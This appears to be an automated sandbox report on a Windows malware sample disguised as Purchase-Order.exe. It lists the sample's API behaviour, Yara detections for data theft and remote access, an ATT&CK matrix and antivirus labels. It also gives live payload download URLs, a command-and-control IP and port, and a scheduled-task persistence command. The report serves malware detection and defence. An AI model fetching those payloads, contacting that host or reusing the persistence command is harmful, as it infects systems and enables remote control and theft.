                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D86E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,8_2_00D86E4A
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D8F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,8_2_00D8F350
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D8FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,8_2_00D8FDD2
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D5DD92 GetFileAttributesW,FindFirstFileW,FindClose,8_2_00D5DD92
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D8FD47 FindFirstFileW,FindClose,8_2_00D8FD47
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D5E47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,8_2_00D5E47B
                                Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000Jump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000Jump to behavior
                                Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000
                                Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000
                                Source: C:\Users\user\Desktop\Purchase-Order.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeFile opened: C:\Users\userJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeFile opened: C:\Users\user\AppDataJump to behavior
                                Source: Purchase-Order.exe, 00000000.00000003.1702576403.00000000008AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\4[]
                                Source: OJTLMJ.exe, 0000000A.00000003.1835753013.000000000108B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee
                                Source: Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: OJTLMJ.exe, 00000011.00000003.2078505010.0000000001545000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\p
                                Source: Synaptics.exe, 00000002.00000002.2953651739.00000000005CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exeProcess information queried: ProcessInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D9703C BlockInput,8_2_00D9703C
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D4374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,8_2_00D4374E
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D746D0 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,8_2_00D746D0
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00DA20F6 LoadLibraryA,GetProcAddress,8_2_00DA20F6
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D6A937 GetProcessHeap,8_2_00D6A937
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D68E19 SetUnhandledExceptionFilter,8_2_00D68E19
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D68E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00D68E3C
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D7BE95 LogonUserW,8_2_00D7BE95
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D4374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,8_2_00D4374E
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D84B52 SendInput,keybd_event,8_2_00D84B52
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D87DD5 mouse_event,8_2_00D87DD5
                                Source: C:\Users\user\Desktop\Purchase-Order.exeProcess created: C:\Users\user\Desktop\._cache_Purchase-Order.exe "C:\Users\user\Desktop\._cache_Purchase-Order.exe" Jump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdateJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn LMDNDG.exe /tr C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exe /sc minute /mo 1
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D7B398 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,8_2_00D7B398
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D7BE31 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,8_2_00D7BE31
                                Source: OJTLMJ.exeBinary or memory string: Shell_TrayWnd
                                Source: Purchase-Order.exe, 00000000.00000003.1701864856.0000000005F33000.00000004.00000020.00020000.00000000.sdmp, Purchase-Order.exe, 00000000.00000000.1695510360.0000000000566000.00000002.00000001.01000000.00000003.sdmp, ._cache_Purchase-Order.exe, 00000001.00000003.1704922851.000000000442A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D67254 cpuid 8_2_00D67254
                                Source: C:\Users\user\Desktop\Purchase-Order.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D640DA GetSystemTimeAsFileTime,__aulldiv,8_2_00D640DA
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00DBC146 GetUserNameW,8_2_00DBC146
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D72C3C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,8_2_00D72C3C
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D5E47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,8_2_00D5E47B
                                Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct

                                Stealing of Sensitive Information

                                barindex
                                Source: Yara matchFile source: dump.pcap, type: PCAP
                                Source: Yara matchFile source: Purchase-Order.exe, type: SAMPLE
                                Source: Yara matchFile source: 0.0.Purchase-Order.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000000.00000000.1695406203.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000002.00000003.1779135345.00000000005DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: Purchase-Order.exe PID: 6664, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 6908, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\Documents\~$cache1, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\Synaptics\RCX600B.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                                Source: OJTLMJ.exe, 00000012.00000002.2484493881.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 10, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytea
                                Source: OJTLMJ.exe, 00000012.00000002.2489810904.0000000004C68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81
                                Source: OJTLMJ.exeBinary or memory string: WIN_XP
                                Source: OJTLMJ.exe, 00000008.00000003.1761524504.00000000045F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81>
                                Source: OJTLMJ.exe, 00000011.00000003.2080888393.00000000045E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81^
                                Source: OJTLMJ.exeBinary or memory string: WIN_XPe
                                Source: OJTLMJ.exeBinary or memory string: WIN_VISTA
                                Source: OJTLMJ.exe, 00000010.00000002.2021902859.00000000044FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81N
                                Source: OJTLMJ.exeBinary or memory string: WIN_7
                                Source: OJTLMJ.exeBinary or memory string: WIN_8

                                Remote Access Functionality

                                barindex
                                Source: Yara matchFile source: dump.pcap, type: PCAP
                                Source: Yara matchFile source: Purchase-Order.exe, type: SAMPLE
                                Source: Yara matchFile source: 0.0.Purchase-Order.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000000.00000000.1695406203.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000002.00000003.1779135345.00000000005DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: Purchase-Order.exe PID: 6664, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 6908, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\Documents\~$cache1, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\Synaptics\RCX600B.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D991DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,8_2_00D991DC
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D996E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,8_2_00D996E2
                                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                Gather Victim Identity Information421
                                Scripting
                                2
                                Valid Accounts
                                11
                                Windows Management Instrumentation
                                421
                                Scripting
                                1
                                Exploitation for Privilege Escalation
                                1
                                Disable or Modify Tools
                                21
                                Input Capture
                                2
                                System Time Discovery
                                Remote Services1
                                Archive Collected Data
                                4
                                Ingress Tool Transfer
                                Exfiltration Over Other Network Medium1
                                System Shutdown/Reboot
                                CredentialsDomains1
                                Replication Through Removable Media
                                1
                                Native API
                                1
                                DLL Side-Loading
                                1
                                DLL Side-Loading
                                1
                                Deobfuscate/Decode Files or Information
                                LSASS Memory1
                                Peripheral Device Discovery
                                Remote Desktop Protocol21
                                Input Capture
                                11
                                Encrypted Channel
                                Exfiltration Over BluetoothNetwork Denial of Service
                                Email AddressesDNS ServerDomain Accounts1
                                Scheduled Task/Job
                                2
                                Valid Accounts
                                2
                                Valid Accounts
                                2
                                Obfuscated Files or Information
                                Security Account Manager1
                                Account Discovery
                                SMB/Windows Admin Shares3
                                Clipboard Data
                                3
                                Non-Application Layer Protocol
                                Automated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal AccountsCron1
                                Scheduled Task/Job
                                21
                                Access Token Manipulation
                                1
                                DLL Side-Loading
                                NTDS4
                                File and Directory Discovery
                                Distributed Component Object ModelInput Capture34
                                Application Layer Protocol
                                Traffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud AccountsLaunchd21
                                Registry Run Keys / Startup Folder
                                12
                                Process Injection
                                112
                                Masquerading
                                LSA Secrets38
                                System Information Discovery
                                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                                Scheduled Task/Job
                                2
                                Valid Accounts
                                Cached Domain Credentials1
                                Query Registry
                                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items21
                                Registry Run Keys / Startup Folder
                                21
                                Virtualization/Sandbox Evasion
                                DCSync141
                                Security Software Discovery
                                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                                Access Token Manipulation
                                Proc Filesystem21
                                Virtualization/Sandbox Evasion
                                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
                                Process Injection
                                /etc/passwd and /etc/shadow3
                                Process Discovery
                                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing11
                                Application Window Discovery
                                Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                                System Owner/User Discovery
                                Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1582343 Sample: Purchase-Order.exe Startdate: 30/12/2024 Architecture: WINDOWS Score: 100 51 freedns.afraid.org 2->51 53 xred.mooo.com 2->53 55 4 other IPs or domains 2->55 65 Suricata IDS alerts for network traffic 2->65 67 Found malware configuration 2->67 69 Antivirus detection for URL or domain 2->69 73 20 other signatures 2->73 9 Purchase-Order.exe 1 6 2->9         started        12 OJTLMJ.exe 2->12         started        15 EXCEL.EXE 188 62 2->15         started        17 6 other processes 2->17 signatures3 71 Uses dynamic DNS services 51->71 process4 file5 43 C:\Users\user\...\._cache_Purchase-Order.exe, PE32 9->43 dropped 45 C:\ProgramData\Synaptics\Synaptics.exe, PE32 9->45 dropped 47 C:\ProgramData\Synaptics\RCX600B.tmp, PE32 9->47 dropped 49 C:\...\Synaptics.exe:Zone.Identifier, ASCII 9->49 dropped 19 ._cache_Purchase-Order.exe 2 5 9->19         started        24 Synaptics.exe 536 9->24         started        83 Antivirus detection for dropped file 12->83 85 Multi AV Scanner detection for dropped file 12->85 87 Machine Learning detection for dropped file 12->87 26 splwow64.exe 15->26         started        signatures6 process7 dnsIp8 57 172.111.138.100, 49758, 5552 VOXILITYGB United States 19->57 37 C:\Users\user\AppData\Roaming\...\OJTLMJ.exe, PE32 19->37 dropped 39 C:\Users\user\AppData\Local\Temp\LMDNDG.vbs, ASCII 19->39 dropped 75 Antivirus detection for dropped file 19->75 77 Multi AV Scanner detection for dropped file 19->77 79 Machine Learning detection for dropped file 19->79 28 cmd.exe 19->28         started        31 wscript.exe 19->31         started        59 docs.google.com 142.250.186.142, 443, 49735, 49736 GOOGLEUS United States 24->59 61 drive.usercontent.google.com 142.250.186.97, 443, 49741, 49742 GOOGLEUS United States 24->61 63 freedns.afraid.org 69.42.215.252, 49739, 80 AWKNET-LLCUS United States 24->63 41 C:\Users\user\Documents\~$cache1, PE32 24->41 dropped 81 Drops PE files to the document folder of the user 24->81 file9 signatures10 process11 signatures12 89 Uses schtasks.exe or at.exe to add and modify task schedules 28->89 33 conhost.exe 28->33         started        35 schtasks.exe 28->35         started        91 Windows Scripting host queries suspicious COM object (likely to drop second stage) 31->91 process13

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand
                                SourceDetectionScannerLabelLink
                                Purchase-Order.exe86%VirustotalBrowse
                                Purchase-Order.exe92%ReversingLabsWin32.Trojan.Synaptics
                                Purchase-Order.exe100%AviraTR/Dldr.Agent.SH
                                Purchase-Order.exe100%AviraHEUR/AGEN.1353217
                                Purchase-Order.exe100%AviraW2000M/Dldr.Agent.17651006
                                Purchase-Order.exe100%Joe Sandbox ML
                                SourceDetectionScannerLabelLink
                                C:\Users\user\Desktop\._cache_Purchase-Order.exe100%AviraHEUR/AGEN.1353217
                                C:\Users\user\Documents\~$cache1100%AviraTR/Dldr.Agent.SH
                                C:\Users\user\Documents\~$cache1100%AviraW2000M/Dldr.Agent.17651006
                                C:\ProgramData\Synaptics\RCX600B.tmp100%AviraTR/Dldr.Agent.SH
                                C:\ProgramData\Synaptics\RCX600B.tmp100%AviraW2000M/Dldr.Agent.17651006
                                C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exe100%AviraHEUR/AGEN.1353217
                                C:\ProgramData\Synaptics\Synaptics.exe100%AviraTR/Dldr.Agent.SH
                                C:\ProgramData\Synaptics\Synaptics.exe100%AviraHEUR/AGEN.1353217
                                C:\ProgramData\Synaptics\Synaptics.exe100%AviraW2000M/Dldr.Agent.17651006
                                C:\Users\user\AppData\Local\Temp\LMDNDG.vbs100%AviraVBS/Runner.VPJI
                                C:\Users\user\Desktop\._cache_Purchase-Order.exe100%Joe Sandbox ML
                                C:\Users\user\Documents\~$cache1100%Joe Sandbox ML
                                C:\ProgramData\Synaptics\RCX600B.tmp100%Joe Sandbox ML
                                C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exe100%Joe Sandbox ML
                                C:\ProgramData\Synaptics\Synaptics.exe100%Joe Sandbox ML
                                C:\ProgramData\Synaptics\RCX600B.tmp92%ReversingLabsWin32.Worm.Zorex
                                C:\ProgramData\Synaptics\Synaptics.exe92%ReversingLabsWin32.Trojan.Synaptics
                                C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exe58%ReversingLabsWin32.Trojan.Lisk
                                C:\Users\user\Desktop\._cache_Purchase-Order.exe58%ReversingLabsWin32.Trojan.Lisk
                                C:\Users\user\Documents\~$cache192%ReversingLabsWin32.Worm.Zorex
                                No Antivirus matches
                                No Antivirus matches
                                SourceDetectionScannerLabelLink
                                https://drive.userconten0%Avira URL Cloudsafe
                                http://xred.site50.net/syn/Synaptics.rarX100%Avira URL Cloudmalware
                                https://drive.usercontent.goog0%Avira URL Cloudsafe
                                http://xred.site50.net/syn/SSLLibrary.dl4100%Avira URL Cloudmalware
                                NameIPActiveMaliciousAntivirus DetectionReputation
                                freedns.afraid.org
                                69.42.215.252
                                truefalse
                                  high
                                  docs.google.com
                                  142.250.186.142
                                  truefalse
                                    high
                                    s-part-0017.t-0009.t-msedge.net
                                    13.107.246.45
                                    truefalse
                                      high
                                      drive.usercontent.google.com
                                      142.250.186.97
                                      truefalse
                                        high
                                        xred.mooo.com
                                        unknown
                                        unknownfalse
                                          high
                                          NameMaliciousAntivirus DetectionReputation
                                          xred.mooo.comfalse
                                            high
                                            http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978false
                                              high
                                              NameSourceMaliciousAntivirus DetectionReputation
                                              https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=Purchase-Order.exe, 00000000.00000003.1704969935.0000000002490000.00000004.00001000.00020000.00000000.sdmpfalse
                                                high
                                                https://drive.usercontent.google.com/download?idSynaptics.exe, 00000002.00000002.3069143286.000000003AFA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1Purchase-Order.exe, 00000000.00000000.1695406203.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, 00000002.00000002.2956093270.0000000002220000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.1779135345.00000000005DC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1Purchase-Order.exe, 00000000.00000000.1695406203.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, 00000002.00000002.2956093270.0000000002220000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.1779135345.00000000005DC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1Purchase-Order.exe, 00000000.00000000.1695406203.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, 00000002.00000002.2956093270.0000000002220000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.1779135345.00000000005DC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://xred.site50.net/syn/Synaptics.rarXPurchase-Order.exe, 00000000.00000003.1704969935.0000000002490000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978hPurchase-Order.exe, 00000000.00000003.1704969935.0000000002490000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          high
                                                          https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGSynaptics.exe, 00000002.00000002.3076603001.000000003B2BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            http://xred.site50.net/syn/SUpdate.iniPurchase-Order.exe, 00000000.00000000.1695406203.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, 00000002.00000002.2956093270.0000000002220000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.1779135345.00000000005DC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dlHPurchase-Order.exe, 00000000.00000003.1704969935.0000000002490000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                high
                                                                https://docs.google.Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://drive.usercontenSynaptics.exe, 00000002.00000002.3020449000.000000001D8B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://drive.usercontent.google.com/Synaptics.exe, 00000002.00000002.2959950848.00000000052A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://drive.usercontent.google.com/download?id=0BxSynaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://xred.site50.net/syn/Synaptics.rarPurchase-Order.exe, 00000000.00000000.1695406203.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, 00000002.00000002.2956093270.0000000002220000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.1779135345.00000000005DC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://xred.site50.net/syn/SSLLibrary.dl4Purchase-Order.exe, 00000000.00000003.1704969935.0000000002490000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: malware
                                                                        unknown
                                                                        https://drive.usercontent.googSynaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://docs.google.com/uc?id=0;Synaptics.exe, 00000002.00000002.3097715360.0000000042BCE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3116678595.000000004D7FE000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://drive.usercontent.google.com/download?DSynaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://xred.site50.net/syn/SSLLibrary.dllPurchase-Order.exe, 00000000.00000000.1695406203.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, 00000002.00000002.2956093270.0000000002220000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.1779135345.00000000005DC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://docs.google.com/Synaptics.exe, 00000002.00000002.2953651739.00000000005BA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3012495090.000000001D481000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3075003681.000000003B278000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3010343676.000000001D334000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://docs.google.com/aSynaptics.exe, 00000002.00000002.3076603001.000000003B2BD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3075003681.000000003B278000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  • No. of IPs < 25%
                                                                                  • 25% < No. of IPs < 50%
                                                                                  • 50% < No. of IPs < 75%
                                                                                  • 75% < No. of IPs
                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                  142.250.186.142
                                                                                  docs.google.comUnited States
                                                                                  15169GOOGLEUSfalse
                                                                                  172.111.138.100
                                                                                  unknownUnited States
                                                                                  3223VOXILITYGBtrue
                                                                                  142.250.186.97
                                                                                  drive.usercontent.google.comUnited States
                                                                                  15169GOOGLEUSfalse
                                                                                  69.42.215.252
                                                                                  freedns.afraid.orgUnited States
                                                                                  17048AWKNET-LLCUSfalse
                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                  Analysis ID:1582343
                                                                                  Start date and time:2024-12-30 11:34:52 +01:00
                                                                                  Joe Sandbox product:CloudBasic
                                                                                  Overall analysis duration:0h 10m 24s
                                                                                  Hypervisor based Inspection enabled:false
                                                                                  Report type:full
                                                                                  Cookbook file name:default.jbs
